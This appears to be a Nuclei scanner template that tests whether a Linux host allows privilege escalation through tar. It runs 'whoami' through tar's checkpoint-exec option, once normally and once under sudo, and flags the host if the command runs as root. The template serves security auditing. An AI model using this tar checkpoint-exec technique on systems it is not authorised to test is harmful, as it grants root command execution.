id: privesc-tar

info:
  name: tar - Privilege Escalation
  author: daffainfo
  severity: high
  description: |
    tar is a command-line utility used to create and manipulate archive files. It is commonly used for bundling multiple files and directories into a single archive, often used in conjunction with compression tools like gzip or bzip2.
  reference:
    - https://gtfobins.github.io/gtfobins/tar/
  metadata:
    verified: true
    max-request: 3
  tags: code,linux,tar,privesc

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      whoami

  - engine:
      - sh
      - bash
    source: |
      tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=whoami

  - engine:
      - sh
      - bash
    source: |
      sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=whoami

    matchers-condition: and
    matchers:
      - type: word
        part: code_1_response
        words:
          - "root"
        negative: true

      - type: dsl
        dsl:
          - 'contains(code_2_response, "root")'
          - 'contains(code_3_response, "root")'
        condition: or
# digest: 4a0a00473045022100a6600a1bd0c8b75b4fd22f81f809aa1aba673c8653164d3623ebcbd5ce4e74d202204370a5b13a731b84aaa1e4a419ae692d02ac7933a2777c496360398af68e3764:922c64590222798bb761d5b6d8e72950